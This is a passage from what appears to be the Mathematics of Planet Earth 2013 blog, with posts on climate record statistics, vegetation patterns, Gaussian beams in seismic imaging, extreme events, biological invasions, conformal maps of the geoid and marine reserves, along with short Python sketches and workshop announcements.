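    return comb(m + k - 1, k) * comb(N - m + n - k, n - k) / comb(N + n, n)

N, n = 50, 11
# Two or more exceedances of the 50-year maximum (m = 1) in 11 years:
print(1 - p_exceedances(0, 1, N, n) - p_exceedances(1, 1, N, n))   # about 0.03
# Ten or more exceedances of the second-highest value (m = 2) in 11 years:
print(sum(p_exceedances(k, 2, N, n) for k in (10, 11)))            # about 1.3e-9
```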

    Clearly, at least one of the assumptions of stochastic independence and of identical distribution must be violated. The plot of August 20 already shows that distributions may vary from year to year, due to El Niño/La Niña effects. La Niña years in particular tend to be cooler when averaged over the entire planet. The assumption of stochastic independence is also questionable, since global weather patterns can persist over months and therefore influence more than one year. Could it be that more exceedances than plausible were observed because global mean temperatures became generally more variable during the past decades? In that case, exceedances in the downward direction (values below the record minimum) would also have been observed more often than predicted by the formula. That's clearly not the case, so that particular effect is unlikely to be solely responsible for what has been observed.

    We see that even this fairly simple climate record leads to serious questions and even partial answers about possible climate change, without any particular climate model.

    Part of this contribution is adapted from the forthcoming book Mathematics and Climate by Hans Kaper and Hans Engler; SIAM, Philadelphia, Pennsylvania, USA (OT131, October 2013).

    Posted in Climate, Extreme Events, Probability, Statistics | Leave a comment

    Biodiversity at SIAM Annual Meeting

    Biodiversity is a major concern today, with species vanishing at a high rate. Nations have launched efforts to preserve species by designating preserves or wilderness areas. Investments of money and resources are needed to establish and maintain such preserves. How does a nation or organization decide how to invest its funds and resources in order to maximize the goals of species preservation? This leads to interesting models and algorithms for optimization of resources, as Hugh Possingham pointed out in his invited presentation at the SIAM Annual Meeting in San Diego in July 2013 titled “Mathematical Problems in Conservation.” An audio version of the talk is available.

    This conference featured Mathematics of Planet Earth as a major theme, as the abstracts of many of the invited talks show.

    Posted in Biodiversity, Conference Report, Mathematics | Leave a comment

    Patterns on Earth

    A recurrent idea in science is that the loss of stability of an equilibrium position through diffusion can lead to the creation of patterns. The idea goes back to Turing in his famous 1952 paper “The chemical basis of morphogenesis,” which proposes a model for morphogenesis through chemical reaction-diffusion. The same idea can explain many of the patterns we see on Earth. We practically never observe a large flat landscape of sand on Earth. Why? On any flat area there are always a few irregularities. When the wind starts blowing, sand grains are transported and deposited behind the irregularities, thus making them grow. After a while, we observe a pattern of dunes. The “diffusion” in this case comes from the wind. The same occurs when the wind induces a regular pattern of waves on the surface of the water. The original equilibrium, consisting of a flat surface, loses its stability when the wind, which plays the role of diffusion, starts to blow. This loss of stability is associated with the appearance of another equilibrium, consisting of a pattern of regular dunes for the sand or of regular waves for the water.

    Spot vegetation around the ruins of Plazuelas in Mexico.

    Similar patterns can be observed for vegetation and, remarkably, they can also be explained through a reaction-diffusion model. I met Antonello Provenzale in Rome during the workshop “Models and Methods for Mathematics of Planet Earth” at the Istituto Nazionale di Alta Matematica (INdAM); he provided me with references on the subject, including some of his own articles. The vegetation patterns occur in semi-arid regions, where there is not enough water for a full vegetation cover. What are the diffusing substances in the model? They are the vegetation on the one hand and the surface water and ground water on the other. The roots of the plants can draw some of the water from the neighboring bare soil. Also, the vegetation protects the soil from evaporation, and this feedback mechanism allows the vegetation patches to persist. The models predict four types of vegetation patterns, depending on parameters such as the quantity of water and the slope of the terrain:

    • Spots are observed in the most arid conditions;
    • When there is more water, we can observe labyrinths;
    • The last pattern before full vegetation is isolated gaps;
    • Finally, stripes are observed when the surface is slanted.

    These four types are observed in vegetation patterns occurring in nature. And, what is more remarkable, they are the same patterns that are observed in animal coat markings and are well explained through a reaction-diffusion model!

    The model explaining vegetation patterns exhibits hysteresis. What does this mean? If the quantity of water is above the threshold allowing for a patched vegetation pattern but below the quantity of water necessary for full vegetation cover, then we have two stable equilibria: one with no vegetation, and one with a vegetation pattern. If the quantity of water decreases below the threshold, the vegetation pattern disappears and the land becomes a desert. But it is not sufficient for the water to come back above the threshold to restore the vegetation. Indeed, the feedback mechanisms are no longer present and cannot support the development of new vegetation patches on a desert: a higher level of water is needed to restore some vegetation. The lesson is that it is much easier to prevent desertification than to restore vegetation once it has disappeared.
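    The hysteresis can be made concrete with a minimal sketch based on the kinetics of a Klausmeier-type vegetation-water model (the spatial diffusion and advection terms are omitted here, and the parameter values are illustrative assumptions, not taken from the articles mentioned above). In this reduced model the bare-soil state is always stable, and a vegetated state exists only when the rainfall parameter is large enough; starting from bare soil, raising the rainfall back above the threshold does not by itself restore the vegetation.

```python
# A minimal sketch of the hysteresis described above, using the kinetics of a
# Klausmeier-type vegetation-water model (spatial terms omitted).  The values
# of a (rainfall) and m (plant loss rate) are illustrative assumptions.
from scipy.integrate import solve_ivp

m = 0.45  # plant mortality; vegetated equilibria exist only for a >= 2*m = 0.9

def kinetics(t, y, a):
    w, n = y                       # w = water, n = vegetation biomass
    return [a - w - w * n**2,      # rainfall - evaporation - uptake by plants
            w * n**2 - m * n]      # plant growth - plant mortality

def final_vegetation(a, n0):
    sol = solve_ivp(kinetics, (0, 500), [a, n0], args=(a,), rtol=1e-8)
    return sol.y[1, -1]

# Starting from a healthy vegetation cover, rainfall a = 1.2 sustains it:
print(final_vegetation(1.2, n0=1.0))    # settles near n = 2.2 (vegetated state)
# Starting from (almost) bare soil at the same rainfall, vegetation does not
# recover: the bare state is also stable.  This is the hysteresis.
print(final_vegetation(1.2, n0=0.01))   # decays toward 0 (desert state)
```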

    Christiane Rousseau

    Posted in Biosphere, Mathematics, Patterns | 1 Comment

    Gaussian Beams

    Nick Tanushev, Chief Scientist, Z-Terra, Inc.

    Like most animals, we have passive sensors that let us observe the world around us. Our eyes let us see light scattered by objects, our ears let us hear sound that is emitted around us and our skin lets us feel warmth. However, we rely on something to generate light, sound or heat for us to observe. One animal that is an exception to this is the bat. Bats use echolocation for navigation and finding prey. That is, they do not passively listen for sound, they actively generate sound pulses and listen for what comes back to figure out where they are and what’s for lunch.

    From an applied mathematical point of view, active sensing using waves is a complex process. Waves generated by the active source have to be modeled as they propagate to an object, reflect and then arrive back at the receiver. Using the amplitude, phase, time lag and possibly other properties of the waves, we have to make inferences about the location of the object that reflected the waves and its properties. It is logical at this moment to ask “Well, if it is such a complex task, how can bats do it so easily?” The answer is that bats use a simplified model of wave propagation. In nearly constant media, such as air, high frequency waves propagate in straight lines, and determining the distance between the bat and the object is simply a matter of knowing the time it takes to hear the echo back and the speed of wave propagation. Our brain uses the same trick to process what our eyes are seeing. You can easily convince yourself with an old elementary school trick: put a pencil in a clear glass of water so that half of it is submerged and lean the pencil to the side so that it is not completely vertical. Looking from the side, it looks as if the pencil is broken at the air-water interface. Of course, this is an optical illusion, because our brain assumes that light has traveled in a straight line when, in fact, it takes two different paths depending on whether it is propagating in the water or in the air.

    A much more sophisticated version of echolocation is used by oil companies to image the subsurface of the earth. A classical description of the equipment used to collect data is a boat that has an active source (an air gun) and a set of receivers (hydrophones) that it drags behind it. The air gun generates waves, these waves propagate, reflect from structures in the earth and return to the hydrophones where they are recorded. The big difference is that seismic waves do not move along straight lines because the earth is composed of many different layers with varying composition. As a result the speed of propagation varies and waves take a complicated path through the earth.

    Using the collected seismic data, an image of the subsurface is formed by starting with a rough estimate of the velocity and modeling the source wave field forward in time and the receiver wave field backward in time using the wave equation. The source and receiver wave fields are then cross-correlated in time to produce an image of the earth. The mismatch between images formed from different source and receiver pairs can be used to get a better estimate of the velocity, and the process is iterated to improve the velocity. Thus, the key to building a good model of the subsurface is being able to solve the wave equation quickly and accurately many times. Direct discretization of the wave equation is computationally too expensive and, like the bats, we have to find a simplified model of wave propagation which captures the physics to sufficient accuracy and can be solved rapidly. Asymptotic methods valid for high frequency waves are used to model the wave propagation. Seismic waves are not considered particularly high frequency, but “high frequency” really means that the wavelength is small compared to the size of the simulation domain and to the scale of the variations of the wave propagation speed, and in this case both of these assumptions are valid.
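    Schematically, the cross-correlation imaging condition mentioned above just multiplies the two wave fields point by point and sums over time. In the toy snippet below, the arrays standing in for the forward-propagated source field and the backward-propagated receiver field are random placeholders, and the grid sizes are arbitrary.

```python
# Schematic cross-correlation imaging condition (toy illustration only).  The
# arrays below stand in for the forward-propagated source wave field and the
# backward-propagated receiver wave field on a common space-time grid; here
# they are just random placeholders with made-up grid sizes.
import numpy as np

nt, nz, nx = 200, 50, 100
rng = np.random.default_rng(1)
source_field = rng.standard_normal((nt, nz, nx))
receiver_field = rng.standard_normal((nt, nz, nx))

# Image value at each subsurface point = sum over time of the product of the
# two wave fields; reflectors show up where the fields are correlated in time.
image = np.einsum('tzx,tzx->zx', source_field, receiver_field)
print(image.shape)   # (nz, nx)
```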

    The most commonly used method is based on geometric optics, also referred to as WKB or ray-tracing. The key idea is to represent the wave field using an amplitude function and a phase function. Usually, these functions are slowly varying (when compared to the wave oscillations) and can be represented numerically by far fewer points than the original wave field. However, there is no free lunch, and this gain comes at the price that the partial differential equation for the phase function is non-linear. One major problem is that the equation for the phase can only be solved classically for a short time, and we have to use more exotic solutions such as viscosity solutions after that. This departure from a classical solution is an observable phenomenon known as “caustics”; we have all observed them as the dancing bright spots at the bottom of a pool. At caustics, waves arrive in phase and the wave field can no longer be represented using a single phase function.

    More recently, an alternative method to geometric optics, called Gaussian beams, has gained popularity. Gaussian beams are asymptotic high frequency wave solutions to hyperbolic partial differential equations (such as the wave equation) that are concentrated on a single curve. Gaussian beams are a packet of waves that propagate coherently. An easy example to think about is a laser pointer. It forms a tight beam of light that is concentrated along a single line. Gaussian beams are essentially the same, except that the width of the beam is much smaller and, in media with varying speed of wave propagation, the curves are not necessarily straight lines. The amplitude of this coherent packet of waves decays like a Gaussian distribution, which gives the beams their name. One of the most important features of Gaussian beams is that they remain regular for all time and do not break down at caustics. The trick to making Gaussian beams a useful tool for solving the wave equation is to recognize that, since the wave equation is linear, we can take many different Gaussian beams and add them together and still obtain an approximate solution to the wave equation. Such superpositions of Gaussian beams allow us to approximate solutions that are not necessarily concentrated on a single curve. Since each Gaussian beam does not break down at a caustic, neither will their superposition.
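    For readers who want to see a formula, the classical paraxial Gaussian beam in a homogeneous medium (the laser-pointer example above) can be written down and evaluated directly. The sketch below is only that special case: the wavelength and waist are arbitrary choices, and a beam in a medium with variable speed would in addition require evolving the beam width and curvature along a generally curved ray.

```python
# A minimal sketch of a single Gaussian beam: the classical paraxial beam in a
# homogeneous 2D medium, propagating along the x-axis.  The wavelength and the
# waist are arbitrary choices; in a medium with variable speed the beam width
# and curvature would have to be evolved along a (generally curved) ray.
import numpy as np

lam = 0.1                      # wavelength
k = 2 * np.pi / lam            # wavenumber
w0 = 0.3                       # beam waist (width at the focus)
xR = k * w0**2 / 2             # Rayleigh range

def gaussian_beam(x, y):
    """Complex field of a paraxial Gaussian beam centred on the x-axis."""
    w = w0 * np.sqrt(1 + (x / xR) ** 2)       # beam width along the ray
    inv_R = x / (x**2 + xR**2)                # curvature of the wave fronts
    gouy = np.arctan(x / xR)                  # Gouy phase shift
    amplitude = np.sqrt(w0 / w) * np.exp(-(y / w) ** 2)
    phase = k * x + k * y**2 * inv_R / 2 - gouy / 2
    return amplitude * np.exp(1j * phase)

# The field stays concentrated near the ray y = 0; by linearity, beams along
# several rays could simply be added to approximate a more general wave field.
x, y = np.meshgrid(np.linspace(0, 10, 400), np.linspace(-3, 3, 200))
u = gaussian_beam(x, y)
print(np.abs(u[:, 0]).max(), np.abs(u[:, -1]).max())
# The peak amplitude decreases along the ray as the beam slowly spreads.
```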

    The existence of Gaussian beam solutions has been known since the 1960s, first in connection with lasers. Later, they were used in pure mathematics to analyse the propagation of singularities in partial differential equations. Since the 1970s, Gaussian beams have been used sporadically in applied mathematics research, with a major industrial success in imaging the earth's sub-salt regions in the Gulf of Mexico in the mid 1980s. From a mathematical point of view, questions about the accuracy of Gaussian beam superposition solutions and the rate of convergence to the exact solution have only been answered in the last ten years, justifying the use of such solutions in numerical methods.

    Single Gaussian beam: Several snapshots of the real part of the wave field for a Gaussian beam are shown. Time flows along the plotted curve, which shows the path of the packet of waves.
    Gaussian beam superposition: Several snapshots of the real part of the wave field for a Gaussian beam superposition are shown. The plotted lines are the curves for the individual Gaussian beams. Note that the wave field remains regular at the caustics, where the curves cross and traditional asymptotic methods break down.
    Posted in Energy, Imaging, Mathematics | Leave a comment

    MPE2013+ Workshop at ASU, January 7-10, 2014

    A workshop “Mathematics of Planet Earth: Challenges and Opportunities” will be held at Arizona State University, January 7-10, 2014. The workshop aims to expose students and junior researchers to the challenges facing our planet, the role of the mathematical sciences in addressing those challenges, and the opportunities to get involved in the effort. Financial support is available for participants to attend this workshop and to take part in follow-up activities.

    About Mathematics of Planet Earth 2013-Plus (MPE2013+): The Center for Discrete Mathematics and Theoretical Computer Science (DIMACS) is sponsoring a new program, MPE2013+. This program, which is an outgrowth of Mathematics of Planet Earth 2013, will consist of a series of workshop clusters scheduled throughout 2014 and 2015 and will focus on research issues concerning several sustainability topics: Management of Natural Resources, Global Change, Natural Disasters, Sustainable Human Environments, and Data-aware Energy Use. Each workshop is planned to encourage research and address fundamental questions in the topic area. Follow-up activities are also planned throughout 2014 and 2015. For more information on MPE2013+, visit the MPE2013+ website.

    How to Apply: Information on the workshop can be found here. Applications by students and junior researchers interested in receiving financial support to attend the workshop are now being accepted. Review of applications will begin on October 1, 2013 and will continue until all slots are filled.

    For more information about the MPE2013+ program and workshop, please contact Dr. Eugene Fiorini at mpe2013plus@dimacs.rutgers.edu.

    Posted in Climate, Climate Change, Energy, Natural Disasters, Resource Management, Sustainability, Workshop Announcement | Leave a comment

    Extreme Events

    Weather extremes capture the public’s attention and are often used as arguments in the debate about climate change. In daily life, the term extreme event can refer, for example, to an event whose intensity exceeds expectations, or an event with high impact, or an event that is rare or even unprecedented in the historical record. Some of these notions may hit the mark, but they need to be quantified if we want to make them useful for a rational discussion of climate change. The concern that extreme events may be changing in frequency and intensity as a result of human influences on climate is real, but the notion of extreme events depends to a large degree on the system under consideration, including its vulnerability, resiliency, and capacity for adaptation and mitigation.

    Since extreme events play such an important role in the current discussion of climate change, it is important that we get their statistics right. The assessment of extremes must be based on long-term observational records and a statistical model of the particular weather or climate element under consideration. The proper framework for their study is probability theory—an important topic of mathematics. The recent special report on managing the risks of extreme events (SREX) prepared by the IPCC describes an extreme event as the “occurrence of a value of a weather or climate variable above (or below) a threshold value near the upper (or lower) ends of the range of observed values of the variable.” Normally, the threshold is put at the 10th or 90th percentile of the observed probability distribution function, but other choices of the thresholds may be appropriate given the particular circumstances.
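    As a small illustration of this definition, the snippet below flags the values of a daily temperature series that lie above its 90th percentile; the synthetic series is just a placeholder for a real station record.

```python
# Flagging "extreme" values in the sense above: observations beyond the 90th
# percentile of the record.  The synthetic series is a placeholder for a real
# station record.
import numpy as np

rng = np.random.default_rng(42)
days = np.arange(365 * 30)                                   # 30 years of daily data
daily_temps = (15 + 10 * np.sin(2 * np.pi * days / 365)      # seasonal cycle
               + rng.normal(scale=3, size=days.size))        # weather noise

threshold = np.percentile(daily_temps, 90)                   # upper-tail threshold
extremes = daily_temps > threshold
print(f"threshold = {threshold:.1f} C, fraction flagged = {extremes.mean():.3f}")
# The flagged fraction is about 0.10 by construction of the threshold.
```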

    When discussing extreme events, it is generally better to use anomalies, rather than absolutes. Anomalies more accurately describe climate variability and give a frame of reference that allows more meaningful comparisons between locations and more accurate calculations of trends. Consider, for example, the global average temperature of the Earth’s surface. We have a fairly reliable record going back to 1880, but rather than looking at the temperature itself, we use the temperature anomaly to study extremes. The figure shows the global temperature anomaly since 1950 relative to the average of these mean temperatures for the period 1961-1990.

    Global temperature anomaly from 1950 to 2011 relative to the base period 1961–1990. (Reprinted with permission from World Meteorological Organization (WMO).)

    We see that the year 2010 tied with 2005 as the warmest year on record. The year 2011 was somewhat cooler, largely because it was a La Niña year; however, it was the warmest La Niña year in recent history.

    While the global mean temperature for the year 2010 does not appear much different from previous years, exceeding the 1961-1990 average by only about $0.5^\mathrm{o}$C, the average June temperature exceeded the corresponding 1971-2000 average by up to $5^\mathrm{o}$C in certain regions, and the same year brought heat waves in North America, western Europe, and Russia. Observed temperature anomalies were, in fact, much higher during certain months in certain regions and it is likely that these extremes were even more pronounced at individual weather stations.

    Since localized extremes cause disruptions of the socioeconomic order, from crop failures to forest fires and excess deaths, they are of considerable interest to the public. To assess the likelihood of their occurrence, we need both access to data and rigorous statistical analysis. Until recently, reliable data have been scarce for many parts of the globe, but they are becoming more widely available, allowing research of extreme events on both global and regional scales. The emphasis shifts thereby from understanding climate models to assessing the likelihood of possibly catastrophic events and predicting their consequences. For what kind of extreme events do we have to prepare? How often do these extremes occur in a stationary climate? What magnitudes can they have? And how does climate change figure in all this?

    Adapted from the forthcoming book “Mathematics and Climate” by Hans Kaper and Hans Engler; SIAM, Philadelphia, Pennsylvania, USA (OT131, October 2013).

    Posted in Extreme Events, Probability, Statistics, Weather | 1 Comment

    Systemic Risk in Complex Systems

    Ten years ago today (8/14/2003), the northeastern U.S. and Ontario suffered the worst blackout in North American history, when an estimated 50 million people lost power. The massive loss of power was attributed to a small event that cascaded through the complex power distribution system.

    This raises the more general question of systemic risk in complex systems – a topic about which mathematics has much to say. The issue is not limited to the power grid, although that too is very much in the news today. Other complex systems including ecological systems, banking systems and large engineered systems can also exhibit cascading failures through interconnected components.

    What can mathematics say about systemic risk in such complex networks? There are a number of resources on this topic. A talk by George Papanicolaou, which focused primarily on risk in the financial sector, may be heard online (audio synchronized to viewgraphs). An article by James Case (SIAM News, December 2013) also covered this talk.

    Furthermore, the U.S. National Academy of Sciences’ Board on Mathematical Sciences and its Applications issued a report in 2007 that addresses many of these issues as well.

    The area of systemic risk remains an active field of research in mathematics and statistics, with many interesting and difficult problems. Some of these are touched upon in the above references.

    With further research one hopes to avoid being kept in the dark by a small event that magnifies as it propagates through a complex system.

    And then there is the banking system….

    Posted in Complex Systems, Mathematics, Networks, Risk Analysis, Statistics | Leave a comment

    Seeing the Earth from Above

    The Earth is undergoing massive changes that are difficult to measure and even harder to forecast. Modeling these changes is required for predicting, planning for, and mitigating the effects of natural and man-made disasters. Processes that affect and feed off of these changes are governed by powerful and complex dynamics that occur at different spatio‐temporal scales. Examples of short‐time scale events include floods, hurricanes, earthquakes, tsunamis, wild fires, and volcanic eruptions. Long-time scale processes include drought, spread of invasive species, population growth, changes in land use, soil degradation, sea level rise, ocean acidification, permafrost melting, glacier retreat, sea ice loss, degradation of fresh water resources, land subsidence, climate change, deforestation, desertification, and critical habitat loss. Obtaining a better understanding of these processes involves the instrumental task of first harnessing the data associated with all relevant sensor modalities and then identifying the proper mathematical models and the computational machinery to process and extract relevant information from the data.

    Terabytes of geospatial data are collected daily from a variety of sources. The amount of data is massive, since these data are often high dimensional. Processing them and extracting useful information from them are major challenges that need to be overcome. Novel mathematical imaging techniques have already begun to address some of these problems. Mathematical and engineering advancements have led to methods for sub-Nyquist sampling rates. These methods are significantly impacting the manner in which sensor acquisition systems collect, model, and analyze the data. To render the exploitation more tractable, researchers have developed innovative techniques for projecting the data into lower dimensional spaces. One such example has been the groundbreaking numerical developments for representing data with appropriately constructed dictionaries, sometimes learned from the data itself. These dictionaries are advantageous for many reasons, including computational efficiency, the ease with which they are implemented, accuracy, and reliability. These and other new paradigms will significantly impact the manner in which we collect, store, transmit, and process data derived from multiple sensors.
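    To illustrate the idea of representing data economically in a suitable dictionary, the sketch below uses the discrete cosine basis as a stand-in for a learned dictionary: it keeps only the largest transform coefficients of a signal and measures the reconstruction error. The signal and the number of retained coefficients are arbitrary choices.

```python
# Illustration of the idea of sparse representation in a dictionary, using the
# discrete cosine basis as a stand-in for a learned dictionary.  The signal and
# the number of retained coefficients are arbitrary choices.
import numpy as np
from scipy.fft import dct, idct

rng = np.random.default_rng(0)
t = np.linspace(0, 1, 1024)
signal = (np.cos(2 * np.pi * 5 * t)
          + 0.5 * np.cos(2 * np.pi * 23 * t)
          + 0.01 * rng.standard_normal(t.size))     # smooth signal plus a little noise

coeffs = dct(signal, norm='ortho')                  # expand the signal in the dictionary
k = 20                                              # keep only the 20 largest atoms
sparse = np.zeros_like(coeffs)
largest = np.argsort(np.abs(coeffs))[-k:]
sparse[largest] = coeffs[largest]
approx = idct(sparse, norm='ortho')                 # reconstruct from the sparse code

rel_err = np.linalg.norm(signal - approx) / np.linalg.norm(signal)
print(f"{k} of {signal.size} coefficients, relative error = {rel_err:.3f}")
```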

    The IMA is offering a workshop, “Imaging in Geospatial Applications” from September 23 to 26, 2013. The workshop will address novel mathematics, new sensor technology, and computational imaging techniques that can lead to innovative ways of exploiting geospatial image information. Since cross‐discipline communication between those who observe Earth and those who strive to model the Earth’s processes must be effective and robust, participants will include scientists who are directly involved in the applications as well as mathematicians, computer scientists, and engineers who are developing mathematical approaches for representing, processing, and analyzing image data. The workshop aims to foster communication among these disciplines in order to validate and better understand models of the Earth’s complex processes by effectively using geospatial image data. Details about the workshop are available here.

    Those interested in the workshop may still apply for participation. They may also follow the workshop on-line in real time or view the talks on video.

    Posted in Data Visualization, Mathematics, Workshop Announcement | Leave a comment

    The Mathematics Behind Biological Invasions

    When asked to give an invited lecture at the first ever Mathematical Congress of the Americas, I jumped at the chance. This would be an opportunity to meet new colleagues from the Americas and to share my interest in mathematical ecology. I found the meeting, in the beautiful town of Guanajuato, to be well organized and friendly. It was structured so as to allow lots of mixing and time to discuss research over refreshments or lunch.

    My particular talk focused on “The Mathematics Behind Biological Invasions,” a subject near and dear to my heart. I enjoy talking about it for three reasons: it has a rich and beautiful history, going back to the work of Fisher, Kolmogorov, Petrovski, Piscounov and others in the 1930s; the mathematics is challenging and the biological implications are significant; and, finally, it is an area that is changing and growing quickly with much recent research.

    The major scientific question addressed in my talk was: how quickly will an introduced population spread spatially? Here the underlying equations are parabolic partial differential equations or related integral formulations. The simplest models are scalar, describing growth and dispersal of a single species, while the more complex models have multiple components, describing competition, predation, disease dynamics, or related processes. Through the combined effects of growth and dispersal, locally introduced populations grow and spread, giving rise to an invasive wave of population density. Thus the key quantity of interest is the so-called spreading speed, the rate at which the invasive wave sweeps across the landscape.

    Ideally one would like to have a formula for this speed, based on model parameters, that could be calculated without having to numerically simulate the equations on the computer. It turns out that such a formula can be derived in some situations and not in others. My talk focused on when it was possible to derive a formula. One useful method for deriving a spreading speed formula is based on linearization of the spreading population about the leading edge of the invasive wave, and then associating the spreading speed of the nonlinear model with that of the linearized model. If this method works, the spreading speed is said to be linearly determined.
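    A quick numerical experiment with the scalar Fisher-KPP equation, $u_t = D u_{xx} + r u(1-u)$, shows the linearly determined speed in action: a locally introduced population spreads at a rate close to $2\sqrt{rD}$. The grid sizes and parameter values in the sketch below are arbitrary choices.

```python
# A minimal sketch: the spreading speed of the scalar Fisher-KPP equation
# u_t = D u_xx + r u (1 - u), estimated from a simulation and compared with the
# linearly determined value 2*sqrt(r*D).  Grid and parameters are illustrative.
import numpy as np

D, r = 1.0, 1.0
L, dx, dt, T = 400.0, 0.5, 0.05, 150.0
x = np.arange(0, L + dx, dx)
u = np.where(x < 5.0, 1.0, 0.0)            # locally introduced population

def front_position(u):
    return x[np.argmax(u < 0.5)]           # first point where the density drops below 1/2

times, positions = [], []
t = 0.0
while t < T:
    lap = np.empty_like(u)
    lap[1:-1] = (u[2:] - 2 * u[1:-1] + u[:-2]) / dx**2
    lap[0], lap[-1] = lap[1], lap[-2]      # crude no-flux boundaries
    u = u + dt * (D * lap + r * u * (1 - u))
    t += dt
    if t > 50.0:                           # ignore the initial transient
        times.append(t)
        positions.append(front_position(u))

speed = np.polyfit(times, positions, 1)[0]
print(f"observed speed {speed:.2f} vs linearly determined speed {2 * np.sqrt(r * D):.2f}")
```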

    It turns out that the conditions for a linearly determined spreading speed, while well understood for scalar models, are challenging to analyze for multicomponent models of the sort that include interactions between species. In some cases, such as competition, the results have been worked out, but in many other cases the question remains open.

    I was gratified that the talk generated discussion and questions, and I hope that the subsequent follow up will result in new collaborations with colleagues in the Americas who are interested in similar questions.

    Mark Lewis
    University of Alberta
    mark.lewis@ualberta.ca

    Posted in Biology, Ecology, Epidemiology | Leave a comment

    Summer Break

    The MPE2013 Daily Blog is taking a summer break. The next post is scheduled for August 15, 2013.

    Posted in General | Leave a comment

    Drawing Conformal Maps of the Earth

    This contribution can be seen as a follow-up to that of July 5, where I discussed the Earth as a deformed sphere that geodesists choose to approximate by the geoid: the geoid is the level surface of the gravitational field corresponding to the mean sea level (MSL).

    It has been known since Gauss that it is not possible to draw maps of the Earth that preserve ratios of distances. But it is possible to find projections of the sphere that preserve ratios of areas: these projections are called equivalent. A typical example is Lambert's cylindrical projection, which was in fact already known to Archimedes. It is also possible to find projections of the sphere that preserve angles: these projections are called conformal. One of them is the stereographic projection, which was already known to the Greek Hipparchus. A second one is the Mercator projection. It is remarkable that Mercator and Hipparchus could prove that their respective projections are conformal without the use of differential calculus.

    But if we consider the geoid, is it possible to draw conformal maps of it? The answer is still positive, but the proof is more subtle. For instance, in the case of conformal mapping, we find elements of a proof in the book “Differential Geometry of Curves and Surfaces” by do Carmo, but he refers to “Riemann Surfaces” by Lipman Bers for a full proof. The proof amounts to showing that a regular differentiable surface can be given a conformal structure, i.e., is a Riemann surface, and the conformal structure is obtained by solving a Beltrami equation.

    Let us discuss the particular case where the geoid is rotationally symmetric around the Earth's axis, by generalizing Mercator's strategy. We consider two angles: $L$ is the longitude and $\ell$ the latitude, and we make the hypothesis that any half-line from the center of the Earth in the direction corresponding to longitude $L$ and latitude $\ell$ cuts the surface in a single point, at a distance $R(\ell)$ from the center of the Earth. The intersection curves of the geoid with the half-planes where $L$ is constant are called the meridians of the geoid, and we wish them to be represented by vertical lines on the map. Similarly, the intersection curves of the geoid with the cones where $\ell$ is constant are called the parallels of the geoid, and we represent them on the map by horizontal segments of length $2\pi$, parameterized by $L$. Let us consider a small region corresponding to a width of $dL$ and a height of $d\ell$ and with corner at $(L,\ell)$ on the geoid. On the geoid, the length of this small region in the direction of the meridians is approximately $\sqrt{R^2+ (R')^2}\,d\ell$ and its width (in the direction of the parallels) is approximately $R\cos \ell \;dL$. Hence, the diagonal makes an angle $\theta$ with the parallels such that $\tan \theta \simeq \frac{\sqrt{R^2+ (R')^2}}{R\cos\ell} \frac{d\ell}{dL}$.

    Now we must compute the projection on the map of a point of longitude $L$ and latitude $\ell$. Its coordinates will be $(L, F(\ell))$. On the map, the small region is represented by a rectangle of width $dL$ and of height $F'(\ell)d\ell$. Hence, the diagonal makes an angle $\theta'$ with the horizontal direction, such that $\tan\theta'= F'(\ell)\frac{d\ell}{dL}$.

    The mapping is conformal if $\theta'= \theta$, which means that $F'(\ell)= \frac{\sqrt{R^2+ (R')^2}}{R\cos\ell}$, from which $F$ can be obtained by integration.

    Note that we could have used the same technique to find an equivalent mapping. If we let $r(\ell)= \frac{R(\ell)}{R(0)}$, then the projection preserves ratios of areas if $F'(\ell)= r\cos\ell\sqrt{r^2+ (r')^2}$, from which $F$ can again be obtained by integration.
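    Both projections can be constructed numerically by integrating the corresponding $F'(\ell)$. As a check, for a constant radius the conformal case must reduce to Mercator's classical formula $F(\ell)=\ln\tan(\pi/4+\ell/2)$. In the sketch below, the slightly flattened profile $R(\ell)$ and its flattening value are illustrative assumptions.

```python
# Numerical construction of the projections described above, by integrating
# F'(l).  For a constant radius the conformal case must recover Mercator's
# formula F(l) = ln tan(pi/4 + l/2); the flattened profile R(l) used afterwards
# is only an illustrative choice.
import numpy as np
from scipy.integrate import quad

def F_conformal(l, R, Rprime):
    """Stretched latitude F(l) for the conformal projection."""
    integrand = lambda s: np.sqrt(R(s)**2 + Rprime(s)**2) / (R(s) * np.cos(s))
    return quad(integrand, 0.0, l)[0]

l = np.radians(60)

# Check against Mercator: constant radius R = 1.
print(F_conformal(l, lambda s: 1.0, lambda s: 0.0),
      np.log(np.tan(np.pi / 4 + l / 2)))       # both about 1.3170

# A slightly flattened, ellipsoid-like profile (illustrative only).
f = 1 / 298.0                                  # flattening, roughly Earth's
R = lambda s: 1.0 - f * np.sin(s) ** 2
Rp = lambda s: -2 * f * np.sin(s) * np.cos(s)
print(F_conformal(l, R, Rp))                   # differs only slightly from the sphere value
```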

    Christiane Rousseau

    Posted in Mathematics | Leave a comment

    Optimal Control and Marine Protected Areas

    There are two standard ways to restrict harvesting of fish in order to maintain or improve the population. One way is to establish marine protected areas where fishing is prohibited, and the other is to allow fishing everywhere but at something less than maximal capacity. Just a few days ago I noticed an interesting preprint on the arXiv that sets up a mathematical framework for deciding whether protected areas should be used and, if so, where they should be established. The article is Optimal Placement of Marine Protected Areas by Patrick De Leenheer, who is an applied mathematician at the University of Florida.

    He sets up the problem as one in optimal control theory, which provides a much broader spectrum of possible harvesting strategies by allowing a harvesting rate that varies from point to point along the one-dimensional coastline. An interval over which the harvesting rate is zero corresponds to a protected area, and so there could conceivably be several protected areas separated by regions that allow some harvesting. De Leenheer proposes to maximize a weighted sum of the total yield and the average fish density:

    The motivation for choosing this measure is that it incorporates two of the main measures that have been used in the past, namely yield and density, coupled with the fact mentioned earlier, that MPA’s are believed to have opposite effects on these measures.

    To me it is not intuitively clear what to expect for the optimal strategy, but De Leenheer's analysis shows that there are three possible optimal strategies that can occur. Which one occurs depends on two parameters: (1) the weight given to the average density in the objective function and (2) the length of the coastline. When the weight of the average density is below a threshold, it is optimal to allow fishing at maximal capacity everywhere. But when the weight exceeds the threshold value, the length of the coastline comes into play. Below a certain critical value of the length parameter it remains optimal to allow fishing everywhere, but above the critical length it is optimal to install a single marine reserve in the middle of the coastline.
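    To get a feel for the trade-off (this is a toy calculation, not De Leenheer's model or objective functional), one can simulate logistic growth with diffusion along a coastline and compare a uniform harvesting rate with a single central no-take reserve. Typically the reserve raises the average density and lowers the total yield, which is exactly why a weighted combination of the two measures is needed. All parameter values below are illustrative assumptions.

```python
# A toy comparison (not De Leenheer's model or objective functional): logistic
# growth with diffusion along a coastline [0, L], harvested at a rate h(x),
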